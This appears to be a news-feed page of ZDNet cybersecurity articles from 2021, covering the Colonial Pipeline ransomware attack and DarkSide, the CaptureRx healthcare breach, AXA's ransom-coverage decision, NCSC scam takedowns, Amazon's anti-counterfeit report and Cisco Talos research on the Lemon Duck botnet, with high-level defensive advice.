Information Technology

“There are two people in a wood, and they run into a bear. The first person gets down on his knees to pray; the second person starts lacing up his boots. The first person asks the second person, “My dear friend, what are you doing? You can’t outrun a bear.” To which the second person responds, “I don’t have to. I only have to outrun you.” – The Imitation Game 

ZDNet Recommends

A ransomware attack hit a major US pipeline this weekend, leading to a shut down in operations for the past three days. Colonial Pipeline will remain shut down for an unknown amount of time, as the organization is ‘developing a system restart plan’ in real time. Critical infrastructure and pieces of the supply chain (which were already fragile due to the pandemic) continue to be taken down by ransomware attacks, either advertently or inadvertently. This has a number of downstream effects on the supply chain, which cause recovery times to grow even bigger as the many companies that these suppliers rely on also attempt to recover. Ransomware is ultimately about business disruption This attack comes at the heels of a crippling year of ransomware attacks across the globe, especially those targeting healthcare organizations. The name of the game: business disruption. Critical infrastructure providers are being targeted by ransomware actors because, when hit with ransomware, they need to choose between indefinite suspension of critical business processes or paying the ransom. Shutting down a crucial resource for an indeterminate amount of time is simply not a sustainable option for a business, and it backs affected providers into a corner where their only option is to pay up. Federal Policy Is Finally On The Table The pipeline operated by Colonial Pipeline delivers around 45% of the fuel consumed on the east coast, making it a massive supplier for the United States. This has elevated the attack to a potential national security threat, with the US government issuing a state of emergency for the length of the shutdown. This demonstrates the continued blurred lines between the public and private sector when it comes to the impact of a cyberattack on nation states. The Biden administration has made securing federal cybersecurity defenses a top priority and planned on passing legislation even before this attack occurred. As these attacks become more frequent, there’s some level of expectation that eventually this legislation could bleed into the private sector, especially critical sectors such as finance, pharmaceutical, energy and more that could be required to have a certain level of information security maturity (like the United States Department of Defense’s Cyber Maturity Model Certification, CMMC which is required for any contractors they currently utilize). What can you do about it right now? As the quote above and the title of this blog suggests, cybercriminals follow Occam’s razor; they are looking for the easiest way to make money. Even the attackers in this specific incident stated publicly, “our goal is to make money”. So what do security pros need to do right now to lower their risk in the face of future ransomware attacks? Outrun the guy next to you. 

Speaking to Chris Krebs’ valuable advice from this morning, security pros at every organization should implement these quick wins right now to limit the impact of a ransomware attack: 

ZDNet Recommends

The best password manager

Everyone needs a password manager. It’s the only way to maintain unique, hard-to-guess credentials for every secure site you and your team access daily.

Read More

Enforce strong passwords. No password12345 has any business in your being in your organization. Build a password policy that enforces strong passwords by default. Check your backups. Make sure you have working backups of data that your organization could not live without. Test whether your backups include what you care about and test whether they restore successfully. Backups are your last line of defense and are critical. Implement Multifactor Authentication (MFA) that’s easy to use and is ubiquitous. This should front the entry points into your infrastructure whether that’s a combination of your identity provider (Azure AD, ADFS, Okta, Ping, etc) and your VPN (Pulse Secure, Cisco AnyConnect, etc). MFA avoids the issue of stolen logins/credentials being easily used to siphon data and infect your organization. Secure privileged accounts immediately. In most of these attacks, we continue to see that domain administrator accounts or other types of privileged accounts are on almost every endpoint or have permission to critical applications giving the attackers an easy way to move laterally. Take inventory of those types of accounts and remove them where possible. Only give employees local administrative rights when necessary, it should never be by default. Update and test your incident response plan. Your response plan needs to include when you inevitably get infected with ransomware and what the plan is that includes both your technology and business departments. It also needs to include who you will contact for help when you’re inevitably hit, which could be your MSSP or another incident response organization that you have on retainer. Ensure that your endpoint protection and security policies on your endpoints are up to date, enforced, and the protection is turned on and working. Often we see organizations that have things like real-time protection disabled, the last time they updated their antivirus definitions was weeks ago, or they have cloud protection turned on, but it doesn’t work because it can’t get out to the internet. Talk to your endpoint protection vendor and ask them about the appropriate health checks to make sure these products are installed, turned on, and working as expected. Make sure that your devices are being patched regularly. Prioritize critical assets like externally facing devices such as VPN concentrators or servers sitting on a DMZ. Ultimately, your organization should be reducing the time that it takes to patch software and operating systems, as monthly patch cycles don’t address how quickly attackers are moving and the remote nature of work. Block uncommon attachment types at your email gateways. Your employees shouldn’t be receiving attachments ending in .exe, .scr, .ps1, .vbs, etc. Microsoft actually blocks a number of these by default in Outlook, but you should take a look at your email security solution and ensure they’re only allowed by exception. Longer term, we know that the way we’ve been doing things isn’t working. Focus on moving from a perimeter-based security architecture to one based on Zero Trust to effectively limit lateral movement and contain the blast radius of a multitude of types of attacks (phishing, malware, supply chain, etc.).  This post was written by Analysts Allie Mellen and Steve Turner, and it originally appeared here.  More

Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services.

ZDNet Recommends

At least three healthcare-related institutions — including UPMC Cole and UPMC Wellsboro in Pennsylvania, Lourdes Hospital and Faxton St. Luke’s Healthcare in New York, Gifford Health Care in Randolph, Vermont and a number of Thrifty Drug Stores — have reportedly had the health information of customers or patients exposed and stolen in the breach. The HIPAA Journal reported that at least 17,655 patients at Faxton St. Luke’s Healthcare, 6,777 patients at Gifford Health Care, and 7,400 at UPMC Cole and UPMC Wellsboro had their information accessed by the cyberattackers, but it is still unclear how many total patients were exposed and how many CaptureRx customers were affected. In a statement, CaptureRx said its team began investigating its systems after someone noticed “unusual activity involving certain of its electronic files” on February 6. By February 19, the company confirmed that patient files, including names, dates of birth, prescription information and medical record numbers, were accessed and stolen. From March 30 to April 7, the company began notifying all of the healthcare providers that had been breached and worked with the companies to contact everyone whose information had been stolen. The company statement urges those affected to monitor their accounts for any unexpected activity. Justin Fier, director of strategic threat and analysis at cybersecurity company Darktrace, said the healthcare sector will remain a prime target for ransomware attacks not only because of the vast amount of personal, and often sensitive, medical data available, but also because healthcare systems simply cannot afford downtime — meaning organizations like CaptureRx are more likely to pay a ransom. Fier added that the emergence of open-source tools and ransomware-as-a-service providers available on the dark web are spurring the increasing frequency of attacks in 2021, noting the recent attack on Swedish radiology software provider Elekta, which affected over 42 U.S. healthcare sites while also preventing cancer patients from receiving necessary radiation treatment. 

Many cybersecurity experts noted that healthcare organizations are particularly ripe targets for ransomware gangs because they carry troves of patient data that can be sold on the dark web or effectively sold back to healthcare organizations for ransom. Healthcare organizations also carry data that cannot be changed, like SSNs and other personal information. 

Flashpoint senior director of intelligence Ian Gray explained that some of the publicly reported high-profile attacks from the past year indicate that larger providers with thousands of downstream providers may have a higher willingness to pay to decrypt the data, or prevent it from being leaked on a ransomware site. Any breaches of personal health care information violate parts of HIPAA and generally trigger investigations by the U.S. Government’s Office of Civil Rights, according to Garret Grajek, CEO of YouAttest. Grajek added that in 2020, both Athen Orthopedic and LIfeSPan Health System were fined $1.5 million and $1.04 million respectively following breaches.Ransomware became such a problem for healthcare organizations in 2020 that the Center for Internet Security began offering a no-cost ransomware protection service for private hospitals in the U.S. that may not be able to afford a robust cybersecurity service. Saumitra Das, CTO at cybersecurity firm Blue Hexagon said the CaptureRx attack highlights the impact of the software supply chain. “Not only can you be breached due to a software you installed with high privilege internally (e.g Solarwinds) but you can also be breached due to your partners who handle your data being breached,” Das said. “Organizations need to look very closely at all their partners who have access to their important data, verify their security practices, and work with the least privilege when possible.” More

When speaking to a cybersecurity expert concerning the Microsoft Exchange Server vulnerabilities several months ago and its impact on thousands of organizations worldwide, they asked, “What could possibly be worse this year?”

Perhaps the situation the United States finds itself in now, with a major pipeline down due to ransomware, comes close. Colonial Pipeline, which supplies 45% of the East Coast’s fuel, revealed a ransomware outbreak on the company’s systems which forced the suspension of operations and some IT systems on Friday, as previously reported by ZDNet.  The attack took place on May 7, and at the time of writing, supply is yet to resume.  Data breaches and security incidents taking place at enterprise organizations are commonplace and hardly a week goes by when we don’t hear of yet another cyberattack on a well-known company — but when core, critical utilities and country infrastructure is involved, things take an even more serious turn.  Colonial Pipeline says that a system restart plan is being “developed” and some small lateral lines are back in service. However, it may be days before full functions are restored, and in the meantime, gasoline futures are rising and there is concern that some parts of the US may experience fuel shortages.  Gasoline futures jumped to their highest level in three years due to the cyberattack.

The USDOT Federal Motor Carrier Safety Administration (FMCSA) agency has issued a Regional Emergency Declaration to try and push back against the supply disruption through temporary exemptions for fuel transport on the road and the permissible hours that drivers are allowed to work for.  The FBI said on May 10 that the agency is working with Colonial to investigate the incident.  But who is responsible? According to the FBI, the DarkSide ransomware group. “The FBI confirms that the Darkside ransomware is responsible for the compromise of the Colonial Pipeline networks,” the law enforcement agency says. “We continue to work with the company and our government partners on the investigation.” DarkSide is a group believed to have been active since the summer of 2020. DarkSide’s malware is offered under a Ransomware-as-a-Service (RaaS) model, and once a system has been breached, ransomware payment demands can range from $200,000 to $2,000,000.  The group has previously been connected to “big game” hunting methods, in which large organizations are targeted — which would fit with the Colonial Pipeline incident.  Other cybercriminal organizations follow the same path, including Hades ransomware operators, which appear to specifically target companies with annual revenue of at least $1 billion.  DarkSide 2.0, the latest version of the ransomware, was recently released under an affiliates program.  DarkSide also employs double-extortion tactics — joining the likes of Maze, Babuk, and Clop, among others — to pressure victims into paying up. At the time of a cyberattack, confidential information may be stolen and threats made to publish this data on a leak site if the victim refuses to give into blackmail.  The leak site operated by DarkSide has gone so far as to create a press corner for journalists and ‘recovery’ firms to reach them directly.  On the leak site, the ransomware group claims to have a code of conduct that prevents attacks against funeral services, hospitals, palliative care, nursing homes, and some companies involved in the distribution of the COVID-19 vaccine.  DarkSide also seems to have gone to some lengths to portray themselves as a kind of Robin Hood. As noted by Cybereason, the group claims that part of ransomware payments go to charity. “Some of the money the companies have paid will go to charity,” DarkSide said in a forum post. “No matter how bad you think our work is, we are pleased to know that we helped change someone’s life.” According to the researchers, however, this attempt to seem like the good guys has fallen flat, with $20,000 in stolen Bitcoin (BTC) donations rejected by charities due to their criminal sources. See also: What is ransomware? Everything you need to know about one of the biggest menaces on the webIn direct contrast to the charity-giving group image, however, the cyberattack on Colonial Pipeline has caused intense disruption economically and socially — and this appears to be a situation the ransomware operators want to distance themselves from.  “We are apolitical, we do not participate in geopolitics, do not need to tie us with a defined government and look for other our motives,” DarkSide said in a statement dated May 10. “Our goal is to make money, and not creating problems for society. We [will] introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.” And yet, the extortion continues, with countdowns on the leak site showing the next batch of dumped, stolen files belonging to other organizations due for release in a matter of hours, at the time of writing.   It should also be noted that when victim companies refuse to pay, DarkSide is willing to share insider information ahead of the publication of stolen data.  “If the company refuses to pay, we are ready to provide information before the publication, so that it would be possible to earn in the reduction price of shares,” the group says. “Write to us in “Contact Us” and we will provide you with detailed information.” While cybercriminals like DarkSide profit, companies like Colonial Pipeline become collateral damage — and this organization is unlikely to be the final victim on the list. On May 10, Colonial Pipeline said the firm must take a “phased approach” in restoring supply and it is hoped that operations can fully resume by the end of the week. “While this situation remains fluid and continues to evolve, the Colonial operations team is executing a plan that involves an incremental process that will facilitate a return to service in a phased approach. This plan is based on a number of factors with safety and compliance driving our operational decisions, and the goal of substantially restoring operational service by the end of the week. The company will provide updates as restoration efforts progress.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Colonial Pipeline said Monday its goal is to substantially restore operational service “by the end of the week” following last week’s ransomware attack, which forced the company to shut down operations and has the potential to hamper fuel distribution for the Eastern US.In a statement, Colonial Pipeline said:Restoring our network to normal operations is a process that requires the diligent remediation of our systems, and this takes time. In response to the cybersecurity attack on our system, we proactively took certain systems offline to contain the threat, which temporarily halted all pipeline operations, and affected some of our IT systems. To restore service, we must work to ensure that each of these systems can be brought back online safely.While this situation remains fluid and continues to evolve, the Colonial operations team is executing a plan that involves an incremental process that will facilitate a return to service in a phased approach. This plan is based on a number of factors with safety and compliance driving our operational decisions, and the goal of substantially restoring operational service by the end of the week. The Company will provide updates as restoration efforts progress.Colonial Pipeline is responsible for supplying 45% of the East Coast’s fuel, including gasoline, diesel, jet fuel, home-heating oil, and fuel for the US military.The FBI confirmed Monday that the Russia-based hacker group DarkSide was behind the attack on Colonial Pipeline. The group runs a ransomware-as-a-service business and sells cybercrime tools to other malicious groups. DarkSide is known for encrypting data for ransom and also for stealing data and using the threat of its exposure as leverage for ransom payouts. In a press briefing, US President Joe Biden said there is no evidence currently that the Russian government was involved in the attack, though the threat actor’s ransomware clearly originates from the country. SEE: Ransomware just got very real. And it’s likely to get worse | What is cyber insurance? Everything you need to know about what it covers and how it works | Best cyber insurance 2021On Monday, DarkSide posted a statement to its website that addresses the attack and the Colonial Pipeline shutdown.

“We are apolitical, we do not participate in geopolitics, do not need to tie us with a defined government and look for our motives,” the statement said. “Our goal is to make money, and not creating problems for society. From today we introduce moderation and check each company that our partners want to encrypt to avoid social consequences in the future.”RELATED: More

Insurance company AXA has revealed that, at the request of French government officials, it will end cyber insurance policies in France that pay ransomware victims back for ransoms paid out to cybercriminals. 

ZDNet Recommends

The best cyber insurance

The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.

Read More

While unconfirmed, the Associated Press reported that the move was an industry first. AXA is one of the five biggest insurers in Europe and made the decision as ransomware attacks become a daily occurrence for organizations across the world. ZDNet reported last month that AXA is the cyber insurance market share leader based on standalone policies.The changes were made only in France after cybersecurity leaders within the French government and French Senators aired concerns about the massive payouts going to cybercriminals during a roundtable in Paris in April.French companies and enterprises, like those in the US, lost billions in 2020 due to devastating ransomware attacks that left organizations crippled for days or weeks, with some estimates showing the country suffered up to $5.5 billion in losses. Only the US had more ransomware attacks in 2020 than France, according to French cybercrime prosecutor Johanna Brousse, who spoke at the Paris roundtable according to The Associated Press. Christine Weirsky, a spokeswoman for the US AXA subsidiary, told The Associated Press that their cyber insurance policies would still cover the costs of recovery. A report from cyber insurance provider Coalition in September noted that ransomware incidents represented 41% of all cyber insurance claims filed in the first half of 2020. The company said there was a 260% increase in the frequency of ransomware attacks among their policyholders and they found that the average ransom demand increased 47%. Claims ranged from as low as $1,000 to $2 million. 

Cybersecurity experts have long complained that the emergence of cyber insurance policies that included coverage for ransom payouts was having a disastrous effect on the popularity of ransomware incidents and was actually spurring more attacks. Knowing that insurance companies would cover company payouts, ransomware attackers became more and more brazen throughout 2020 and 2021. Many of the attacks in 2020 specifically targeted crucial government institutions like hospitals or K-12 schools, knowing they were more likely to have to pay in order to regain control of systems and important data.  

ZDNet Recommends

“This decision is not a surprise to us. In fact, other carriers may follow the suit. However, businesses need protection from these events and in some cases even from going bankrupt due to ransomware,” said Cowbell Cyber CEO Jack Kudale, adding that often the cost of the ransom itself equals other damaging attack costs like business interruption, notification, restoration, credit monitoring, forensics, and crisis management. Other experts, like Digital Shadows senior cyber threat intelligence analyst Xue Yin Peh, explained that even when organizations are forced to pay ransoms, there is no guarantee that encrypted files and systems will be recovered. Even premiums associated with cyber insurance may increase as a result of a ransomware attack, she added. Sean Cordero, security advisor at Netenrich, said he expects more cyber insurance providers like AXA to seek to minimize their exposure from high-risk policies they’ve written or are considering underwriting, making it more difficult to secure or renew policies. For the first time, some insurers will request new evidence and validation from their policyholders to prove the policyholders’ controls’ adequacy, Cordero explained. “This validation is complex, and many insurers still rely on client self-attestation as the primary input to risk and policy determination. These insurers will hopefully transition to more data-driven models specific to the cybersecurity industry. For huge organizations, this may translate into third-party audits before completing underwriting,” Cordero said. Cordero added that some cyber insurers are now using attack surface intelligence, data science, cyber-specific actuarial models, and more to address the increase in attacks and reduce premiums.This, Cordero said, may “lead to broader coverage when the insured can prove their controls and readiness.” More

More websites hosting phishing domains and other online scams have been taken down during the last year than during the previous three years combined. The UK’s National Cyber Security Centre’s (NCSC) fourth annual Active Cyber Defence report details how it helped remove many more scams from the internet: in total, more than 1.4 million URLs responsible for 700,000 online scams have been removed by the NCSC’s takedown service during the last 12 months.The last year has seen a big rise in Covid-19 themed cyber crime and the NCSC has helped to take down thousands of URLs associated with phishing and malware attacks using warnings about Covid-19 or false offers of vaccines.The NCSC also helped to take down fake online shops hosted in the UK, as well as fake celebrity endorsement scams used in an attempt to lure people into falling victim to cyber attacks. Often these scams begin with phishing messages which take victims through several URLs before they land on the final malicious site.SEE: Cybersecurity: Let’s get tactical (ZDNet/TechRepublic special feature) | Download the free PDF version (TechRepublic)Scams and phishing campaigns designed to look like they came from the government, the NHS, HMRC and many other high profile organisations have all been taken down as part of the NCSC’s Active Cyber Defence (ACD) programme which it said aims to protect “the majority of people in the UK from the majority of the harm caused by the majority of the cyber attacks the majority of the time.” Tools in the ACD arsenal include the takedown service for finding malicious sites and sending notifications to the host to remove them from the internet. It also includes the Suspicious Email Reporting Service, a feature introduced last year which allows members of the public to forward emails suspected to be fraudulent directly to the NCSC for further investigation.

To date, the service has received over four million emails and has helped identify more than 1.5 million malicious URLs and has helped lead to the takedown of tens of thousands of scams that hadn’t previously been identified. However the reported noted there was also a decrease in the percentage of attacks taken down within 24 hours, from 64.6% in 2019 to 55.5% in 2020″The ACD programme is truly a collaborative effort, and it’s thanks to our joint efforts with partners both at home and internationally that we’ve been able to significantly ramp up our efforts to protect the UK,” said Dr Ian Levy, technical director of the NCSC.”The bold defensive approach taken by the ACD programme continues to ensure our national resilience and so I urge public bodies, companies and the general public to sign up to the services available to help everyone stay safe online,” he added.MORE ON CYBERSECURITY More

Amazon’s crusade against counterfeit product sellers on the firm’s platform continues with two million products seized and destroyed in 2020. 

The e-commerce giant, known for shopping events such as Prime Day, allows third-party sellers across the globe to tout their wares on the Amazon platform. However, it takes only a brief glance at some products to know there are issues. Fake, counterfeit products, poor quality, misleading photos, and more are all noted in buyer reviews and there are vast numbers of counterfeit operations that Amazon is attempting to detect and remove.  While some sellers abuse the platform in colorful ways — such as the case of an Instagram influencer who was shut down after allegedly selling dupes with pictures of generic products in the marketplace — others continue to trade without detection.  However, Amazon wants to bring down “counterfeit to zero” on the platform and to benchmark the firm’s progress has released its first Brand Protection Report (.PDF) to the public.  According to the report, which documents anti-counterfeit activities during 2020, there have been “increased attempts by bad actors to commit fraud and offer counterfeit products,” leading to the seizure of millions of products sent to fulfillment centers which were then destroyed.  “Amazon destroyed those products to prevent them from being resold elsewhere in the supply chain,” the company says. 

The e-commerce giant added that over 10 billion “suspect” listings were blocked before being published, and over six million attempts to create seller accounts suspected of being involved in counterfeit operations were prevented.  When it comes to brands being impersonated by counterfeit sellers, Amazon says that less than 0.01% of products sold received an allegation from a customer of being fake, and in these cases, over 7,000 SMBs were connected via Amazon’s Counterfeit Crimes Unit to legal teams in the US and Europe.  Over $700 million was invested in 2020 to combat counterfeit product operations.  “Amazon continues to innovate on its robust proactive controls and powerful tools for brands, and won’t rest until there are zero counterfeits in its store,” Amazon commented. “However, this is an escalating battle with criminals that continue to look for ways to sell counterfeits, and the only way to permanently stop these counterfeiters is to hold them accountable through the court system and criminal prosecution.” Another problem that likely gives Amazon a headache is the custom of unscrupulous sellers who pay customers to leave five-star reviews. A data leak earlier this month implicated approximately 200,000 individuals in a review scam — potentially originating from China — in which sellers ‘refund’ a product’s price once a glowing review is left on the item’s Amazon listing.  In response, the company said, “we suspend, ban, and take legal action against those who violate [community and review] policies.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Researchers have explored the latest activities of the Lemon Duck hacking group, including the leverage of Microsoft Exchange Server vulnerabilities and the use of decoy top-level domains. 

The active exploit of zero-day Microsoft Exchange Server vulnerabilities in the wild was a security disaster for thousands of organizations. Four critical flaws, dubbed ProxyLogon, impact on-prem Microsoft Exchange Server 2013, 2016, and 2010. Patches, vulnerability detection tools, and mitigation instructions were made available in March, but it is still estimated that up to 60,000 organizations may have been compromised.  Exploit code, too, is now available, and at least 10 advanced persistent threat (APT) groups have adopted the flaws in attacks this year.  In late March, Microsoft said the Lemon Duck botnet had been observed exploiting vulnerable servers and using the systems to mine for cryptocurrency. Now, researchers from Cisco Talos have provided a deep dive into the cyberattackers’ current tactics.  Lemon Duck operators are incorporating new tools to “maximize the effectiveness of their campaigns” by targeting the high-severity vulnerabilities in Microsoft Exchange Server and telemetry data following DNS queries to Lemon Duck domains indicates that campaign activity spiked in April.  

The majority of queries came from the US, followed by Europe and South East Asia. A substantial spike in queries to one Lemon Duck domain was also noted in India.  Lemon Duck operators use automated tools to scan, detect, and exploit servers before loading payloads such as Cobalt Strike DNS beacons and web shells, leading to the execution of cryptocurrency mining software and additional malware.  The malware and associated PowerShell scripts will also attempt to remove antivirus products offered by vendors such as ESET and Kaspersky and will stop any services — including Windows Update and Windows Defender — that could hamper an infection attempt.  Scheduled tasks are created to maintain persistence, and in recent campaigns, the CertUtil command-line program is utilized to download two new PowerShell scripts that are tasked with the removal of AV products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner.  Competing cryptocurrency miner signatures, too, are hardcoded and written up in a “killer” module for deletion.  SMBGhost and Eternal Blue have been used in past campaigns, but as the leverage of Microsoft Exchange Server flaws shows, the group’s tactics are constantly changing to stay ahead of the curve.  Lemon Duck has also been creating decoy top-level domains (TLDs) for China, Japan, and South Korea to try and obfuscate command-and-control (C2) center infrastructure. “Considering these ccTLDs are most commonly used for websites in their respective countries and languages, it is also interesting that they were used, rather than more generic and globally used TLDs such as “.com” or “.net,” Cisco Talos notes. “This may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments.” Overlaps between the Lemon Duck botnet and Beapy/Pcastle cryptocurrency malware have also been observed.  “The use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments,” the researchers say. “New TTPs consistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software vulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific interest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or increase the number of systems within the Lemon Duck botnet.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More